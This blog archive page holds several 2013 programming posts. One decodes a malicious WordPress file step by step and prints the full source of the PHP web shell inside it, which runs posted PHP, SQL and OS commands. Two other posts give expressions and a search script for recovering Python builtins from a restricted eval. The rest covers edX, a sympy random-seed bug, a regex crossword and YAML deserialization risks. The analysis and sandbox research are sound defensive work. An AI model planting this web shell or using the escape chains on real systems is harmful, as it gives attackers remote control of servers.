« | » Main « | »

Working at edX

Thursday 28 February 2013

This week I began a new job at edX. Well, it isn't really a new job, I've been freelancing with them since October, but now I'm an employee.

edX logo

EdX is a non-profit formed by Harvard and MIT to put their courses online. Other top universities have joined, including Berkeley, Rice, McGill, the Delft University of Technology, and others.

Online learning is huge these days, despite being saddled with the worst acronym ever (MOOC, Massive Open Online Course), so there's no shortage of interesting questions:

  • How do you take an existing university course and put it online?
  • What can you do differently if you are educating 100,000 people at once?
  • What are the best tools to give professors to author courses?
  • How can you automatically grade students' responses even for challenging material like programming or essays?
  • What will online education look like in 10 years? Where and how will it be successful?

There are plenty of smart people at edX working on these questions, and I think we have a good chance at finding the right answers. There's stiff competition from Coursera and Udacity, but edX is a bit different, both because it is a non-profit, and because we are chartered by our universities to help them change on-campus education as well as online education.

Almost everything is written in Python and Django, and we're aiming to open-source what we can.

I'm excited. I enjoyed freelancing for a few years, now I know how that works, and I might go back to it someday. But it feels good to be in the middle of edX, helping build something great.

Ad-hoc decoding a backdoor

Saturday 23 February 2013

My mom's wordpress site has some malware on it, and she sent it to me for a professional opinion. The mystery file was called wp-rss3.php. Looking at it showed that there was source code being encoded in it, so understanding what it did would require decoding the data. I fired up a Python prompt, and started picking away.

Read the file, and take a quick look to see what structure it has:

>>> wprss3 = open('wp-rss3.php').read()
>>> wprss3[:100]
'<?php $_8b7b="\\x63\\x72\\x65\\x61\\x74\\x65\\x5f\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e";$_8b7b1f="\\x62\\x61\\x73\\x'

The file is one long line, so let's split it into lines:

>>> wprss3 = wprss3.replace(' ', '\n').replace(';',';\n').splitlines()
>>> len(wprss3)
6
>>> [len(l) for l in wprss3]
[5, 70, 64, 28123, 13, 2]

OK, six lines, one of which has the bulk of the data. Let's look at them:

>>> wprss3[0]
'<?php'
>>> wprss3[1]
'$_8b7b="\\x63\\x72\\x65\\x61\\x74\\x65\\x5f\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e";'

The line 0 is uninteresting, but line 1 defines a string using hex escapes. Lots of our steps here will require getting raw data from a string that is the bulk of what we're looking at. Splitting on double-quotes will get us pieces, one of which is the one we want. Rather than counting pieces to find the right one, we know the one we want will be the longest piece. So we can use max() to find the longest piece:

>>> d = max(wprss3[1].split('"'), key=len)
>>> d
'\\x63\\x72\\x65\\x61\\x74\\x65\\x5f\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e'

One of Python's handy-dandy decoders is 'string_escape' which can turn a string with backslash-x sequences into the correct string:

>>> d.decode('string_escape')
'create_function'

OK, so $_8b7b is "create_function", a PHP function. Let's see what line 2 gives us:

>>> wprss3[2]
'$_8b7b1f="\\x62\\x61\\x73\\x65\\x36\\x34\\x5f\\x64\\x65\\x63\\x6f\\x64\\x65";'
>>> max(wprss3[2].split('"'), key=len).decode('string_escape')
'base64_decode'

Interesting, now for the bulk of the data, line 3:

>>> wprss3[3][:100]
'$_8b7b1f56=$_8b7b("",$_8b7b1f("JGs9MTQzOyRtPWV4cGxvZGUoIjsiLCIyMzQ7MjUzOzI1MzsyMjQ7MjUzOzIwODsyNTM7M'
>>> wprss3[3][-100:]
'OzI0MjsxNzU7Iik7JHo9IiI7Zm9yZWFjaCgkbSBhcyAkdilpZiAoJHYhPSIiKSR6Lj1jaHIoJHZeJGspO2V2YWwoJHopOw=="));'

Mentally using our definitions of $_8b7b and $_8b7b1f, this is equivalent to:

$_8b7b1f56 = create_function("", base64_decode("JGs9MTQ...Hop0w=="));

BTW, I did not know that PHP would execute function names in strings as simply as $fnname(), but it does not surprise me.

What's in the base64 data?

>>> d = max(wprss3[3].split('"'), key=len).decode('base64')
>>> len(d)
21064
>>> d[:100]
'$k=143;$m=explode(";","234;253;253;224;253;208;253;234;255;224;253;251;230;225;232;167;202;208;202;2'
>>> d[-100:]
'33;175;175;175;175;242;130;133;242;175;");$z="";foreach($m as $v)if ($v!="")$z.=chr($v^$k);eval($z);'

The decoded data is 20k long, and visual inspection shows that the middle is just lots of numbers separated by semicolons. The PHP code is decoding those numbers by XORing them with 143, using them as ASCII codepoints, and evaluating the result. So we want to perform the same decoding to see what source code results:

>>> nums = max(d.split('"'), key=len).split(';')
>>> len(nums)
5246
>>> nums[:10]
['234', '253', '253', '224', '253', '208', '253', '234', '255', '224']
>>> source = "".join(chr(int(n) ^ 143) for n in nums)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<stdin>", line 1, in <genexpr>
ValueError: invalid literal for int() with base 10: ''
>>> source = "".join(chr(int(n) ^ 143) for n in nums if n)
>>> print source

This finally shows us the source of the backdoor which is executed when the page wp-rss3.php is visited in a browser. I've reformatted it here slightly just to break long lines:

error_reporting(E_ERROR | E_WARNING | E_PARSE);
ini_set('display_errors', "0");

if ($_POST["p"] != "") {
        $_COOKIE["p"] = $_POST["p"];
        setcookie("p", $_POST["p"], time() + 3600);
}

if (md5($_COOKIE["p"]) != "ca3f717a5e53f4ce47b9062cfbfb2458") {
        echo "<form method=post>";
        echo "<input type=text name=p value='' size=50>";
        echo "<input type=submit name=B_SUBMIT value='Check'>";
        echo "</form>";
        exit;
}

if ($_POST["action"] == "upload") {

    $l=$_FILES["filepath"]["tmp_name"];
    $newpath=$_POST["newpath"];
    if ($newpath!="") move_uploaded_file($l,$newpath);
    echo "done";

} else if ($_POST["action"] == "sql") {

    $query = $_POST["query"];
    $query = str_replace("\'","'",$query);
    $lnk = mysql_connect($_POST["server"], $_POST["user"], $_POST["pass"]) or die ('Not connected : ' . mysql_error());
    mysql_select_db($_POST["db"], $lnk) or die ('Db failed: ' . mysql_error());
    mysql_query($query, $lnk) or die ('Invalid query: ' . mysql_error());
    mysql_close($lnk);
    echo "done<br><pre>$query</pre>";

} else if ($_POST["action"] == "runphp") {

    eval(base64_decode($_POST["cmd"]));

} else {

    $disablefunc = @ini_get("disable_functions");
    if (!empty($disablefunc)) {
        $disablefunc = str_replace(" ","",$disablefunc);
        $disablefunc = explode(",",$disablefunc);
    } else $disablefunc = array();

    function myshellexec($cmd) {
        global $disablefunc;
        $result = "";
        if (!empty($cmd)) {
            if (is_callable("exec") and !@in_array("exec",$disablefunc)) {
                @exec($cmd,$result); $result = @join("\n",$result);
            }
            elseif (($result = `$cmd`) !== FALSE) {}
            elseif (is_callable("system") and !@in_array("system",$disablefunc)) {
                $v = @ob_get_contents(); 
                @ob_clean(); 
                @system($cmd); 
                $result = @ob_get_contents(); 
                @ob_clean(); 
                echo $v;
            }
            elseif (is_callable("passthru") and !@in_array("passthru",$disablefunc)) {
                $v = @ob_get_contents(); 
                @ob_clean(); 
                @passthru($cmd); 
                $result = @ob_get_contents(); 
                @ob_clean(); 
                echo $v;
            }
            elseif (is_resource($fp = @popen($cmd,"r"))) {
                $result = "";
                while(!feof($fp)) {$result .= @fread($fp,1024);}
                @pclose($fp);
            }
        }
        return $result;
    }
        $cmd = stripslashes($_POST["cmd"]);
        $cmd_enc = stripslashes($_POST["cmd_enc"]);
        if ($_POST["enc"]==1){
                $cmd=base64_decode($cmd_enc);
        }
        ?>
<script language=javascript type="text/javascript">
<!--
var END_OF_INPUT = -1;
var base64Chars = new Array('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W',
'X','Y','Z','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0',
'1','2','3','4','5','6','7','8','9','+','/');
var reverseBase64Chars = new Array();
for (var i=0; i < base64Chars.length; i++){
    reverseBase64Chars[base64Chars[i]] = i;
}
var base64Str;
var base64Count;
function setBase64Str(str){
    base64Str = str;
    base64Count = 0;
}
function readBase64(){
    if (!base64Str) return END_OF_INPUT;
    if (base64Count >= base64Str.length) return END_OF_INPUT;
    var c = base64Str.charCodeAt(base64Count) & 0xff;
    base64Count++;
    return c;
}
function encodeBase64(str){
    setBase64Str(str);
    var result = '';
    var inBuffer = new Array(3);
    var lineCount = 0;
    var done = false;
    while (!done && (inBuffer[0] = readBase64()) != END_OF_INPUT){
        inBuffer[1] = readBase64();
        inBuffer[2] = readBase64();
        result += (base64Chars[ inBuffer[0] >> 2 ]);
        if (inBuffer[1] != END_OF_INPUT){
            result += (base64Chars [(( inBuffer[0] << 4 ) & 0x30) | (inBuffer[1] >> 4) ]);
            if (inBuffer[2] != END_OF_INPUT){
                result += (base64Chars [((inBuffer[1] << 2) & 0x3c) | (inBuffer[2] >> 6) ]);
                result += (base64Chars [inBuffer[2] & 0x3F]);
            } else {
                result += (base64Chars [((inBuffer[1] << 2) & 0x3c)]);
                result += ('=');
                done = true;
            }
        } else {
            result += (base64Chars [(( inBuffer[0] << 4 ) & 0x30)]);
            result += ('=');
            result += ('=');
            done = true;
        }
        lineCount += 4;
        if (lineCount >= 76){
            result += ('\n');
            lineCount = 0;
        }
    }
    return result;
}
function encodeIt(f){
        l=encodeBase64(f.cmd.value);
        f.cmd_enc.value=l;
        f.cmd.value="";
        f.enc.value=1;
        f.submit();
}
//--></script>
        <?

    echo "<form method=post action='' onSubmit='encodeIt(this);return false;'>";
    echo "<input type=text name=cmd value=\"".str_replace("\"","&quot;",$cmd)."\" size=150>";
    echo "<input type=hidden name=enc value='0'>";
    echo "<input type=hidden name=cmd_enc value=''>";
    echo "<input type=submit name=B_SUBMIT value='Go'>";
    echo "</form>";
    if ($cmd != "") {
        echo "<pre>";
        $cmd=stripslashes($cmd);
        echo "Executing $cmd \n";
        echo myshellexec("$cmd");
        echo "</pre>";
        exit;
    }
}

As you can quickly see, this is a nasty piece of work: it takes commands from the client and will execute PHP code, or SQL, or OS shell commands. I don't understand all the back and forth of the forms handling here, but it doesn't matter, it's clearly intended to let a remote attacker have his way on your machine. Bad stuff.

I wonder if a Wordpress installation could be checked for malware by looking for files that are too high a proportion of base64-encoded text?

I told my mom to remove the file, but I suspect there will be more cleaning up to do...

Getting started with programming terminology

Sunday 17 February 2013

I sat in on a beginner's programming class a few weeks ago, and I was struck by the bizarre words we routinely use, but which must sound like nonsense to beginners.

Take the simple program:

print "Hello, world!"

What is the word "print" doing here? Printing means to produce marks on a piece of paper. There's no paper involved. And "Hello, world!" is a string? It certainly doesn't look like a piece of string.

Expressions have no range of emotion at all, arguments aren't debating anything. Comprehensions are incomprehensible, floats just lie there. You can't put a price on values, dictionaries have no order.

It's no wonder beginners think we're all nuts.

Hunting a random() bug

Thursday 14 February 2013

At edX, we have Python behind the scenes in courses to initialize the state of problems presented to students. Often, these problems are randomized so that different students will see different details in quantitative problems, but each student's random seed is saved so that the student will see the same problem if they revisit the page.

The seed is used to seed the random module before executing any chunk of course Python, so that you can simply use the random module and know that you'll get an appropriate value.

Today I found code like this in a course:

import q
random.seed(the_seed)
# ... generate the problem ...

My task was to refactor how information flowed around, and the_seed wasn't going to be available, so I asked why the code was like this. It seemed odd, because the random module had just been seeded before this code was invoked, so why had the author bothered to re-seed the module with the same seed?

The answer was that it was a mysterious bug from months ago where the first time the code was run, it would produce a different result than any other time, and the re-seeding solved it. The q import seemed to be messing with the random seed, but only the first time.

The "only first time" clue pointed to it being code that is run on import. Remember, Python modules are just a series of statements, and when you import a module, it really executes all the statements. There's no "import mode" that just collects function definitions. If you write a statement with a side effect at the top level of a module, that side effect will happen when you import the module.

But statements in module are only executed the first time the module is imported in a process. Subsequent imports simply produce another reference to the existing module object. Everything pointed to a statement running during import which stomped on the random module.

The q module imported a number of other modules, including numpy and sympy. But why would importing a module re-seed the random module?

A little experimenting showed that sympy was at fault here:

Python 2.7.3 (default, Aug  1 2012, 05:16:07) 
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> # Some baseline data
>>> import random
>>> random.seed(17)
>>> random.random()
0.5219839097124932
>>> random.random()
0.8066907771186791
>>> random.random()
0.9604947743238768
>>> random.random()
0.2896253777644655
>>> 
>>> # Re-seed, and import sympy
>>> random.seed(17)
>>> import sympy
>>> random.random()
0.8066907771186791
>>>

Looking at the values, after importing sympy, we've skipped ahead one number in our random sequence. So sympy isn't re-seeding the generator, it's consuming a random number.

To find out where, we resorted to a monkey-patching trick: Replace random.random with a booby-trap:

Python 2.7.3 (default, Aug  1 2012, 05:16:07) 
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import random
>>> random.random = lambda: 1/0
>>> import sympy
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/venv/lib/python2.7/site-packages/sympy/__init__.py", line 20, in <module>
    from sympy.core import *
  File "/venv/lib/python2.7/site-packages/sympy/core/__init__.py", line 8, in <module>
    from expr import Expr, AtomicExpr
  File "/venv/lib/python2.7/site-packages/sympy/core/expr.py", line 2020, in <module>
    from mul import Mul
  File "/venv/lib/python2.7/site-packages/sympy/core/mul.py", line 1197, in <module>
    from numbers import Rational, igcd
  File "/venv/lib/python2.7/site-packages/sympy/core/numbers.py", line 1993, in <module>
    from function import FunctionClass
  File "/venv/lib/python2.7/site-packages/sympy/core/function.py", line 43, in <module>
    from sympy.utilities import default_sort_key
  File "/venv/lib/python2.7/site-packages/sympy/utilities/__init__.py", line 13, in <module>
    from runtests import test, doctest
  File "/venv/lib/python2.7/site-packages/sympy/utilities/runtests.py", line 472, in <module>
    class SymPyTests(object):
  File "/venv/lib/python2.7/site-packages/sympy/utilities/runtests.py", line 475, in SymPyTests
    seed=random.random()):
  File "<stdin>", line 1, in <lambda>
ZeroDivisionError: integer division or modulo by zero

OK, not sure why it's importing its tests when I try to use the package, but looking at the code, here's the culprit:

class SymPyTests(object):
    def __init__(self, ..., seed=random.random()):
        #...
        self._seed = seed

Here we can see the problem. Remember that function arguments are computed once, when the function is defined. Since this function is defined when the module is imported, random.random() will be called during import, consuming one of our random numbers.

Better would be to define it like this:

class SymPyTests(object):
    def __init__(self, ..., seed=None):
        #...
        self._seed = seed
        if self._seed is None:
            self._seed = random.random()

I'm not quite sure which behavior the author wanted, one seed for all the instances, or one seed per instance. I know I don't want importing this module to change my random number sequence.

Amusingly enough, the behavior of the initializer is irrelevant, it's only called in one place, and never defaults the seed argument:

def test(*paths, **kwargs):
    ...
    seed = kwargs.get("seed", None)
    if seed is None:
        seed = random.randrange(100000000)
    t = SymPyTests(..., seed)

The best solution for our code would be to not rely on the module-level random number sequence, and instead use our own Random object. Come to think of it, that's what sympy should do too.

BTW, looking at why sympy is importing test infrastructure when I import it, there's this in sympy/utilities/__init__.py:

"""Some utilities that may help.
"""
from iterables import (flatten, group, take, subsets,
    variations, numbered_symbols, cartes, capture, dict_merge,
    postorder_traversal, preorder_traversal, interactive_traversal,
    prefixes, postfixes, sift, topological_sort)

from lambdify import lambdify
from source import source

from decorator import threaded, xthreaded

from runtests import test, doctest

from cythonutils import cythonized
from timeutils import timed

from misc import default_sort_key

This makes using utilities very convenient, since it contains everything at the top level. But the downside is it means you must always take everything. There is no way to import only part of utilities. Even if you use "from utilities.lambdify import lambdify," Python will execute the utilities/__init__.py file, importing everything.

Lessons:

  • Modules really execute when imported,
  • Function defaults are computed once when the function is defined,
  • Modifying global state like the random module's implicit sequence is bad,
  • Importing stuff into __init__.py makes your code monolithic and harder to use as you want, and
  • Monkey-patching can be a great way to debug problems.

Finding Python 3 builtins

Tuesday 12 February 2013

Eryksun commented on yesterday's blog post,

You can recover __builtins__ from a function's __globals__:

f = [t for t in ().__class__.__base__.__subclasses__() if t.__name__ == 'Sized'][0].__len__ __builtins__ = f.__globals__['__builtins__']

Sure enough, that gets you a reference to the built-ins, even in an eval with no builtins. It points up two deficiencies in my searching code from yesterday. First, I was only examining constructed objects, not the classes themselves, but more importantly, I was looking at object's attributes but not the keys in dictionaries!

Here's the updated search code, which also has some nicer uses of generators:

"""Look for builtins..."""

import types

def is_builtins(v):
    """Does v seem to be the builtins?"""
    if hasattr(v, "open") and hasattr(v, "__import__"):
        return True
    if isinstance(v, dict):
        return "open" in v and "__import__" in v
    return False

def construct_some(cl):
    """Construct objects from class `cl`.

    Yields (obj, description) tuples.

    """
    # First yield the class itself
    classname = "{}.{}".format(cl.__module__, cl.__name__)
    yield cl, classname

    made = False
    for args in [
        (), ("x",), ("x", "y"), ("x", "y", "z"),
        ("utf8",), ("os",), (1, 2, 3),
        (0,0,0,0,0,b"KABOOM",(),(),(),"","",0,b""),
        # Maybe there are other useful constructor args?
    ]:
        try:
            obj = cl(*args)
        except:
            continue
        desc = "{}{}".format(classname, args)
        yield obj, desc
        made = True
    
    if not made:
        print("Couldn't make a {}".format(classname))

def attributes(obj):
    """Produce a sequence of (name, value), the attributes of `obj`."""
    try:
        for n in dir(obj):
            if n in ('__dict__',):
                continue
            try:
                yield n, getattr(obj, n)
            except:
                continue
    except:
        pass

def items(obj):
    """Produce a sequence of (key, value), the items of `obj`."""
    try:
        for k in obj.keys():
            try:
                yield k, obj[k]
            except:
                continue
    except:
        pass

def attrs_and_items(obj, desc):
    """Produce a sequence of (name, value, desc) for data from `obj`."""
    for n, v in attributes(obj):
        desc2 = "{}.{}".format(desc, n)
        yield n, v, desc2
    for k, v in items(obj):
        desc2 = "{}[{!r}]".format(desc, k)
        yield k, v, desc2

def examine(obj, desc, seen, depth):
    """Examine the data reachable from `obj`, looking for builtins."""
    if depth > 10:
        return
    if id(obj) in seen:
        return
    if isinstance(obj, (type(""), type(b""), type(u""))):
        return

    seen.add(id(obj))

    # Look at the attributes and items
    for n, v, desc2 in attrs_and_items(obj, desc):
        if is_builtins(v):
            print("Looks like {} might be builtins".format(desc2))
        else:
            examine(v, desc2, seen, depth+1)


examined = 0
for cl in object.__subclasses__():
    seen = set()
    for obj, desc in construct_some(cl):
        print("Examining {}".format(desc))
        examine(obj, desc, seen, 0)
    examined += len(seen)

print("Examined {} objects".format(examined))

When I run this code, it finds things like,

...
Looks like reprlib.Repr.__init__.__globals__['builtins'] might be builtins
Looks like os._wrap_close.__enter__.__globals__['lseek'].__self__.__loader__.find_module.__func__.__globals__['__builtins__'] might be builtins
Looks like sre_parse.Pattern.__init__.__globals__['__loader__'].__class__.__init__.__globals__['__builtins__'] might be builtins
Looks like sre_parse.SubPattern.__delitem__.__globals__['__builtins__'] might be builtins
...

and many other similar lines. The builtins were right there all along, if you know where to look.

Looking for Python 3 builtins

Monday 11 February 2013

I discovered Floyd's follow-up to my Eval really is dangerous post. He catalogs a few interesting variations. At the end, though, he mentions the difficulty of finding the original builtins on Python 3.

If you remember, in Python 2, we did it like this:

[
    c for c in ().__class__.__base__.__subclasses__() 
    if c.__name__ == 'catch_warnings'
][0]()._module.__builtins__

This relies on the fact that warnings.catch_warnings is defined, so we can get it from object's subclasses, and on the fact that that object has a _module attribute which is a module.

Python 3 doesn't seem to have that class defined right off the bat, so we can't count on it for finding the builtins. But, I figured, there must be some other class that would serve the same purpose?

To find out, I tried searching for one. Here's the code I used:

import types

def is_builtins(v):
    """Does v seem to be the builtins?"""
    if hasattr(v, "open") and hasattr(v, "__import__"):
        return True
    if isinstance(v, dict):
        return "open" in v and "__import__" in v
    return False

def construct_some(cl):
    """Construct objects from class `cl`.

    Yields (obj, description) tuples.

    """
    made = False
    for args in [
        (), ("x",), ("x", "y"), ("x", "y", "z"),
        ("utf8",), ("os",), (1, 2, 3),
        (0,0,0,0,0,b"KABOOM",(),(),(),"","",0,b""),
        # Maybe there are other useful constructor args?
    ]:
        try:
            obj = cl(*args)
        except:
            continue
        desc = "{}.{}{}".format(cl.__module__, cl.__name__, args)
        yield obj, desc
        made = True
    
    if not made:
        print("Couldn't make a {}.{}".format(cl.__module__, cl.__name__))

def examine_attrs(obj, chain, seen, depth):
    """Examine the attributes on `obj`, looking for builtins."""
    if depth > 10:
        return
    if id(obj) in seen:
        return
    if isinstance(obj, (type(""), type(b""), type(u""))):
        return
    seen.add(id(obj))
    for n in dir(obj):
        try:
            v = getattr(obj, n)
        except:
            continue
        name = chain+"."+n
        if is_builtins(v):
            print("Looks like {} might be builtins".format(name))
        else:
            examine_attrs(v, name, seen, depth+1)

examined = 0
for cl in object.__subclasses__():
    seen = set()
    for obj, desc in construct_some(cl):
        print("Constructed {}".format(desc))
        examine_attrs(obj, desc, seen, 0)
    examined += len(seen)

print("Examined {} objects".format(examined))

This code iterates all the subclasses of object, and tries a bunch of different constructor arguments to try to make one. If it succeeds, it recursively examines the attributes reachable from the object, looking for an object or dict that has "open" and "__import__".

Running this on Python 3.3 sure enough doesn't find anything like builtins, after examining 20k objects. And running it on Python 2.7 finds only the catch_warnings object we had before.

I wouldn't have guessed it was so unusual for an object to hold a reference to a module. Am I overlooking an important principle, or is this just not something people do?

A regular crossword

Saturday 9 February 2013

A friend shared a link to an unusual puzzle (click for a full-page PDF):

A Regular Crossword

Each row has a regular expression indicating the letters to fill the row. Each cell is at the intersection of three rows, so there are a number of constraints to satisfy at each point.

Overlapping constraints are a good basis for logic puzzles. Sudoku, Ken-Ken, Nonograms, and plenty of other puzzle forms follow the same recipe: determine the contents of a cell, based on multiple simultaneous constraints.

But the regexes here add an extra dimension. Each of the regexes here has a different form, resulting in different levels of information. Two rows have .*, or no information at all. Another has [CR]*, so we know the entire row is C's and R's. Each row has a different regex, so the interaction is varied across the grid.

I wrote to the author, Dan Gulotta, about how he constructed it, and he told me,

I constructed the letter grid by building it up a few letters at a time. I started out with a blank grid and all of the regular expressions set to '.*'. At each step, I would find a place where I wanted to add a few letters to the grid and then see if I could replace some regular expressions with more constrained ones in order to force those letters to be there. In this way, I was able to ensure that the solution was unique.

A few times during my solving of the puzzle, I used the classic piece of puzzle meta-information as part of the deduction: there is a unique solution. A friend of mine said he solved it without using that fact, but I don't see a reason to avoid it.

By the way, I didn't realize this when I solved it, but there's another level to the puzzle, which is to identify the phrase in it. It was part of the 2013 MIT Mystery Hunt.

War is peace

Friday 1 February 2013

The Rails community has had a few high-profile security issues this week. They are well-summarized, with an alarming list of what follow-ons to expect, by Patrick McKenzie: What the Rails Security Issue Means for Your Startup.

tl;dr:

  • Ruby's YAML parser will execute arbitrary Ruby code,
  • YAML is parsed all over the place in Rails, including for all JSON input,
  • Pretty much every Rails app is going to be compromised soon.

The Python community is in a slightly better position. True, we have pickle in the standard library, which has exactly the same problem, but it's rare to find applications that accept pickles from untrusted sources.

Don't ever unpickle data you don't trust!

The 3rd-party YAML parser PyYAML has the same issue as Ruby's YAML parser. By default, it will let you create arbitrary Python objects, which means it can run arbitrary Python code. YAML isn't nearly as pervasive in the Python world, and we don't parse JSON with the YAML parser usually, but this can still create security holes.

PyYAML has a .load() method and a .safe_load() method. Why do serialization implementers do this? If you must extend the format with dangerous features, provide them in the non-obvious method. Provide a .load() method and a .dangerous_load() method instead. At least that way people would have to decide to do the dangerous thing. I would advocate for PyYAML to make this change now, who cares if backward compatibility breaks? Most people using .load() never intended to deserialize arbitrary Python objects anyway, so they'll never notice.

If you use the PyYAML library in your code, check now that you are using the .safe_load() method.

If you want automatic serialization of your user-defined classes, take a look at Cerealizer, which works similarly to pickle, but is built to be secure from the start. I've never used it, but it looks promising.

BTW, this whole circus reminded me of Allen Short's excellent lightning talk from PyCon 2010: Big Brother's Design Rules (skip to 17:30). To summarize Allen's pithy maxims:

  • War is Peace: assume you are at war, all input is an attack, and then you can be at peace.
  • Slavery is Freedom: the more you constrain your code's behavior, the more freedom you have to act. The smaller your interface, the smaller your attack surface.
  • Ignorance is Strength: the less your code knows about, the fewer things it can break. This is the principle of least authority.

Allen in particular mentions that adding "conveniences" to your interface can make your life harder later on. In Ruby's case, there were two unneeded conveniences that combined to make things really bad: parse JSON with the YAML parser, and let the YAML parser construct arbitrary Ruby objects. Neither of these is actually needed by 99.999% of programs reading JSON, but now all of them are compromisable.

Think hard about what your program does. Stay safe.

« | » Main « | »